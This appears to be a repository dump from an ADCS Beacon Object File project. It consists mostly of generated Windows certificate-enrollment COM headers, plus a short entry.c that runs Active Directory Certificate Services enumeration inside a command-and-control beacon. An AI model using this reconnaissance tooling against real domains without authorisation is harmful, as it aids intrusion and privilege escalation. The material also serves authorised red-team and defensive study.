	SubjectNameRequireCommonName	= 0x40000000,
	SubjectNameRequireEmail	= 0x20000000,
	SubjectNameRequireDNS	= 0x10000000,
	SubjectNameAndAlternativeNameOldCertSupplies	= 0x8,
	SubjectAlternativeNameEnrolleeSupplies	= 0x10000,
	SubjectAlternativeNameRequireDirectoryGUID	= 0x1000000,
	SubjectAlternativeNameRequireUPN	= 0x2000000,
	SubjectAlternativeNameRequireEmail	= 0x4000000,
	SubjectAlternativeNameRequireSPN	= 0x800000,
	SubjectAlternativeNameRequireDNS	= 0x8000000,
	SubjectAlternativeNameRequireDomainDNS	= 0x400000
    } 	X509CertificateTemplateSubjectNameFlag;

typedef 
enum X509CertificateTemplatePrivateKeyFlag
    {	PrivateKeyRequireArchival	= 0x1,
	PrivateKeyExportable	= 0x10,
	PrivateKeyRequireStrongKeyProtection	= 0x20,
	PrivateKeyRequireAlternateSignatureAlgorithm	= 0x40
    } 	X509CertificateTemplatePrivateKeyFlag;


EXTERN_C const IID LIBID_CERTENROLLLib;

EXTERN_C const CLSID CLSID_CObjectId;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2000-217d-11da-b2a4-000e7bbb2b09")
CObjectId;
#endif

EXTERN_C const CLSID CLSID_CObjectIds;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2001-217d-11da-b2a4-000e7bbb2b09")
CObjectIds;
#endif

EXTERN_C const CLSID CLSID_CBinaryConverter;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2002-217d-11da-b2a4-000e7bbb2b09")
CBinaryConverter;
#endif

EXTERN_C const CLSID CLSID_CX500DistinguishedName;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2003-217d-11da-b2a4-000e7bbb2b09")
CX500DistinguishedName;
#endif

EXTERN_C const CLSID CLSID_CCspInformation;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2007-217d-11da-b2a4-000e7bbb2b09")
CCspInformation;
#endif

EXTERN_C const CLSID CLSID_CCspInformations;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2008-217d-11da-b2a4-000e7bbb2b09")
CCspInformations;
#endif

EXTERN_C const CLSID CLSID_CCspStatus;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2009-217d-11da-b2a4-000e7bbb2b09")
CCspStatus;
#endif

EXTERN_C const CLSID CLSID_CX509PublicKey;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200b-217d-11da-b2a4-000e7bbb2b09")
CX509PublicKey;
#endif

EXTERN_C const CLSID CLSID_CX509PrivateKey;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200c-217d-11da-b2a4-000e7bbb2b09")
CX509PrivateKey;
#endif

EXTERN_C const CLSID CLSID_CX509Extension;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200d-217d-11da-b2a4-000e7bbb2b09")
CX509Extension;
#endif

EXTERN_C const CLSID CLSID_CX509Extensions;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200e-217d-11da-b2a4-000e7bbb2b09")
CX509Extensions;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionKeyUsage;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200f-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionKeyUsage;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionEnhancedKeyUsage;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2010-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionEnhancedKeyUsage;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionTemplateName;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2011-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionTemplateName;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionTemplate;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2012-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionTemplate;
#endif

EXTERN_C const CLSID CLSID_CAlternativeName;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2013-217d-11da-b2a4-000e7bbb2b09")
CAlternativeName;
#endif

EXTERN_C const CLSID CLSID_CAlternativeNames;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2014-217d-11da-b2a4-000e7bbb2b09")
CAlternativeNames;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionAlternativeNames;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2015-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionAlternativeNames;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionBasicConstraints;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2016-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionBasicConstraints;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionSubjectKeyIdentifier;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2017-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionSubjectKeyIdentifier;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionAuthorityKeyIdentifier;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2018-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionAuthorityKeyIdentifier;
#endif

EXTERN_C const CLSID CLSID_CSmimeCapability;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2019-217d-11da-b2a4-000e7bbb2b09")
CSmimeCapability;
#endif

EXTERN_C const CLSID CLSID_CSmimeCapabilities;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201a-217d-11da-b2a4-000e7bbb2b09")
CSmimeCapabilities;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionSmimeCapabilities;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201b-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionSmimeCapabilities;
#endif

EXTERN_C const CLSID CLSID_CPolicyQualifier;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201c-217d-11da-b2a4-000e7bbb2b09")
CPolicyQualifier;
#endif

EXTERN_C const CLSID CLSID_CPolicyQualifiers;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201d-217d-11da-b2a4-000e7bbb2b09")
CPolicyQualifiers;
#endif

EXTERN_C const CLSID CLSID_CCertificatePolicy;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201e-217d-11da-b2a4-000e7bbb2b09")
CCertificatePolicy;
#endif

EXTERN_C const CLSID CLSID_CCertificatePolicies;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201f-217d-11da-b2a4-000e7bbb2b09")
CCertificatePolicies;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionCertificatePolicies;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2020-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionCertificatePolicies;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionMSApplicationPolicies;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2021-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionMSApplicationPolicies;
#endif

EXTERN_C const CLSID CLSID_CX509Attribute;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2022-217d-11da-b2a4-000e7bbb2b09")
CX509Attribute;
#endif

EXTERN_C const CLSID CLSID_CX509Attributes;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2023-217d-11da-b2a4-000e7bbb2b09")
CX509Attributes;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeExtensions;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2024-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeExtensions;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeClientId;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2025-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeClientId;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeRenewalCertificate;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2026-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeRenewalCertificate;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeArchiveKey;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2027-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeArchiveKey;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeArchiveKeyHash;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2028-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeArchiveKeyHash;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeOSVersion;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202a-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeOSVersion;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeCspProvider;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202b-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeCspProvider;
#endif

EXTERN_C const CLSID CLSID_CCryptAttribute;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202c-217d-11da-b2a4-000e7bbb2b09")
CCryptAttribute;
#endif

EXTERN_C const CLSID CLSID_CCryptAttributes;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202d-217d-11da-b2a4-000e7bbb2b09")
CCryptAttributes;
#endif

EXTERN_C const CLSID CLSID_CCertProperty;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202e-217d-11da-b2a4-000e7bbb2b09")
CCertProperty;
#endif

EXTERN_C const CLSID CLSID_CCertProperties;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202f-217d-11da-b2a4-000e7bbb2b09")
CCertProperties;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyFriendlyName;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2030-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyFriendlyName;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyDescription;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2031-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyDescription;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyAutoEnroll;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2032-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyAutoEnroll;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyRequestOriginator;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2033-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyRequestOriginator;
#endif

EXTERN_C const CLSID CLSID_CCertPropertySHA1Hash;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2034-217d-11da-b2a4-000e7bbb2b09")
CCertPropertySHA1Hash;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyKeyProvInfo;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2036-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyKeyProvInfo;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyArchived;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2037-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyArchived;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyBackedUp;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2038-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyBackedUp;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyEnrollment;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2039-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyEnrollment;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyRenewal;

#ifdef __cplusplus

class DECLSPEC_UUID("884e203a-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyRenewal;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyArchivedKeyHash;

#ifdef __cplusplus

class DECLSPEC_UUID("884e203b-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyArchivedKeyHash;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyEnrollmentPolicyServer;

#ifdef __cplusplus

class DECLSPEC_UUID("884e204c-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyEnrollmentPolicyServer;
#endif

EXTERN_C const CLSID CLSID_CSignerCertificate;

#ifdef __cplusplus

class DECLSPEC_UUID("884e203d-217d-11da-b2a4-000e7bbb2b09")
CSignerCertificate;
#endif

EXTERN_C const CLSID CLSID_CX509NameValuePair;

#ifdef __cplusplus

class DECLSPEC_UUID("884e203f-217d-11da-b2a4-000e7bbb2b09")
CX509NameValuePair;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRequestPkcs10;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2042-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRequestPkcs10;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRequestCertificate;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2043-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRequestCertificate;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRequestPkcs7;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2044-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRequestPkcs7;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRequestCmc;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2045-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRequestCmc;
#endif

EXTERN_C const CLSID CLSID_CX509Enrollment;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2046-217d-11da-b2a4-000e7bbb2b09")
CX509Enrollment;
#endif

EXTERN_C const CLSID CLSID_CX509EnrollmentWebClassFactory;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2049-217d-11da-b2a4-000e7bbb2b09")
CX509EnrollmentWebClassFactory;
#endif

EXTERN_C const CLSID CLSID_CX509EnrollmentHelper;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2050-217d-11da-b2a4-000e7bbb2b09")
CX509EnrollmentHelper;
#endif

EXTERN_C const CLSID CLSID_CX509MachineEnrollmentFactory;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2051-217d-11da-b2a4-000e7bbb2b09")
CX509MachineEnrollmentFactory;
#endif

EXTERN_C const CLSID CLSID_CX509EnrollmentPolicyActiveDirectory;

#ifdef __cplusplus

class DECLSPEC_UUID("91f39027-217f-11da-b2a4-000e7bbb2b09")
CX509EnrollmentPolicyActiveDirectory;
#endif

EXTERN_C const CLSID CLSID_CX509EnrollmentPolicyWebService;

#ifdef __cplusplus

class DECLSPEC_UUID("91f39028-217f-11da-b2a4-000e7bbb2b09")
CX509EnrollmentPolicyWebService;
#endif

EXTERN_C const CLSID CLSID_CX509PolicyServerListManager;

#ifdef __cplusplus

class DECLSPEC_UUID("91f39029-217f-11da-b2a4-000e7bbb2b09")
CX509PolicyServerListManager;
#endif

EXTERN_C const CLSID CLSID_CX509PolicyServerUrl;

#ifdef __cplusplus

class DECLSPEC_UUID("91f3902a-217f-11da-b2a4-000e7bbb2b09")
CX509PolicyServerUrl;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateTemplateADWritable;

#ifdef __cplusplus

class DECLSPEC_UUID("8336E323-2E6A-4a04-937C-548F681839B3")
CX509CertificateTemplateADWritable;
#endif
#endif /* __CERTENROLLLib_LIBRARY_DEFINED__ */

/* Additional Prototypes for ALL interfaces */

unsigned long             __RPC_USER  BSTR_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

unsigned long             __RPC_USER  VARIANT_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out VARIANT * ); 
void                      __RPC_USER  VARIANT_UserFree(     __RPC__in unsigned long *, __RPC__in VARIANT * ); 

unsigned long             __RPC_USER  BSTR_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree64(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

unsigned long             __RPC_USER  VARIANT_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out VARIANT * ); 
void                      __RPC_USER  VARIANT_UserFree64(     __RPC__in unsigned long *, __RPC__in VARIANT * ); 

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif





================================================
FILE: AD-BOF/ADCS-BOF/src/enum/entry.c
================================================
#include <windows.h>
#include <stdio.h>
#define DYNAMIC_LIB_COUNT 4
#include "beacon.h"
#include "bofdefs.h"
#include "base.c"
#include "adcs_enum_com2.c"


#ifdef BOF
VOID go(
	IN PCHAR Buffer,
	IN ULONG Length
)
{
	HRESULT hr = S_OK;
	datap parser;
	wchar_t * pwszServer = NULL;
	wchar_t * pwszNameSpace = NULL;	
	wchar_t * pwszQuery = NULL;
    
	if (!bofstart())
	{
		return;
	}

	BeaconDataParse(&parser, Buffer, Length);
	
	hr = adcs_enum_com2();

	if (S_OK != hr)
	{
		BeaconPrintf(CALLBACK_ERROR, "adcs_enum_com2 failed: 0x%08lx\n", hr);
	}

	internal_printf("\nadcs_enum_com2 SUCCESS.\n");

	printoutput(TRUE);
};
#else
int main(int argc, char ** argv)
{
	HRESULT hr = S_OK;

	hr = adcs_enum_com2();

	if (S_OK != hr)
	{
		BeaconPrintf(CALLBACK_ERROR, "adcs_enum_com2 failed: 0x%08lx\n", hr);
	}

	internal_printf("\nadcs_enum_com2 SUCCESS.\n");
	
	return 0;
}
#endif

	






================================================
FILE: AD-BOF/ADCS-BOF/src/request/CertCli.h
================================================


/* this ALWAYS GENERATED file contains the definitions for the interfaces */


 /* File created by MIDL compiler version 8.01.0622 */
/* @@MIDL_FILE_HEADING(  ) */



/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif

/* verify that the <rpcsal.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCSAL_H_VERSION__
#define __REQUIRED_RPCSAL_H_VERSION__ 100
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */

#ifndef COM_NO_WINDOWS_H
#include "windows.h"
#include "ole2.h"
#endif /*COM_NO_WINDOWS_H*/

#ifndef __certcli_h__
#define __certcli_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

/* Forward Declarations */ 

#ifndef __ICertGetConfig_FWD_DEFINED__
#define __ICertGetConfig_FWD_DEFINED__
typedef interface ICertGetConfig ICertGetConfig;

#endif 	/* __ICertGetConfig_FWD_DEFINED__ */


#ifndef __ICertConfig_FWD_DEFINED__
#define __ICertConfig_FWD_DEFINED__
typedef interface ICertConfig ICertConfig;

#endif 	/* __ICertConfig_FWD_DEFINED__ */


#ifndef __ICertConfig2_FWD_DEFINED__
#define __ICertConfig2_FWD_DEFINED__
typedef interface ICertConfig2 ICertConfig2;

#endif 	/* __ICertConfig2_FWD_DEFINED__ */


#ifndef __ICertRequest_FWD_DEFINED__
#define __ICertRequest_FWD_DEFINED__
typedef interface ICertRequest ICertRequest;

#endif 	/* __ICertRequest_FWD_DEFINED__ */


#ifndef __ICertRequest2_FWD_DEFINED__
#define __ICertRequest2_FWD_DEFINED__
typedef interface ICertRequest2 ICertRequest2;

#endif 	/* __ICertRequest2_FWD_DEFINED__ */


#ifndef __ICertRequest3_FWD_DEFINED__
#define __ICertRequest3_FWD_DEFINED__
typedef interface ICertRequest3 ICertRequest3;

#endif 	/* __ICertRequest3_FWD_DEFINED__ */


#ifndef __CCertGetConfig_FWD_DEFINED__
#define __CCertGetConfig_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertGetConfig CCertGetConfig;
#else
typedef struct CCertGetConfig CCertGetConfig;
#endif /* __cplusplus */

#endif 	/* __CCertGetConfig_FWD_DEFINED__ */


#ifndef __CCertConfig_FWD_DEFINED__
#define __CCertConfig_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertConfig CCertConfig;
#else
typedef struct CCertConfig CCertConfig;
#endif /* __cplusplus */

#endif 	/* __CCertConfig_FWD_DEFINED__ */


#ifndef __CCertRequest_FWD_DEFINED__
#define __CCertRequest_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertRequest CCertRequest;
#else
typedef struct CCertRequest CCertRequest;
#endif /* __cplusplus */

#endif 	/* __CCertRequest_FWD_DEFINED__ */


#ifndef __CCertServerPolicy_FWD_DEFINED__
#define __CCertServerPolicy_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertServerPolicy CCertServerPolicy;
#else
typedef struct CCertServerPolicy CCertServerPolicy;
#endif /* __cplusplus */

#endif 	/* __CCertServerPolicy_FWD_DEFINED__ */


#ifndef __CCertServerExit_FWD_DEFINED__
#define __CCertServerExit_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertServerExit CCertServerExit;
#else
typedef struct CCertServerExit CCertServerExit;
#endif /* __cplusplus */

#endif 	/* __CCertServerExit_FWD_DEFINED__ */


/* header files for imported files */
#include "wtypes.h"
#include "certif.h"

#ifdef __cplusplus
extern "C"{
#endif 


/* interface __MIDL_itf_certcli_0000_0000 */
/* [local] */ 

#include <winapifamily.h>
#pragma region Desktop Family
#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)


extern RPC_IF_HANDLE __MIDL_itf_certcli_0000_0000_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certcli_0000_0000_v0_0_s_ifspec;

#ifndef __ICertGetConfig_INTERFACE_DEFINED__
#define __ICertGetConfig_INTERFACE_DEFINED__

/* interface ICertGetConfig */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertGetConfig;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("c7ea09c0-ce17-11d0-8833-00a0c903b83c")
    ICertGetConfig : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE GetConfig( 
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertGetConfigVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertGetConfig * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertGetConfig * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertGetConfig * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertGetConfig * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertGetConfig * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertGetConfig * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertGetConfig * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *GetConfig )( 
            __RPC__in ICertGetConfig * This,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut);
        
        END_INTERFACE
    } ICertGetConfigVtbl;

    interface ICertGetConfig
    {
        CONST_VTBL struct ICertGetConfigVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertGetConfig_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertGetConfig_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertGetConfig_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertGetConfig_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertGetConfig_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertGetConfig_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertGetConfig_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertGetConfig_GetConfig(This,Flags,pstrOut)	\
    ( (This)->lpVtbl -> GetConfig(This,Flags,pstrOut) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertGetConfig_INTERFACE_DEFINED__ */


#ifndef __ICertConfig_INTERFACE_DEFINED__
#define __ICertConfig_INTERFACE_DEFINED__

/* interface ICertConfig */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertConfig;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("372fce34-4324-11d0-8810-00a0c903b83c")
    ICertConfig : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Reset( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__out LONG *pCount) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Next( 
            /* [retval][out] */ __RPC__out LONG *pIndex) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetField( 
            /* [in] */ __RPC__in const BSTR strFieldName,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetConfig( 
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertConfigVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertConfig * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertConfig * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertConfig * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertConfig * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertConfig * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertConfig * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertConfig * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
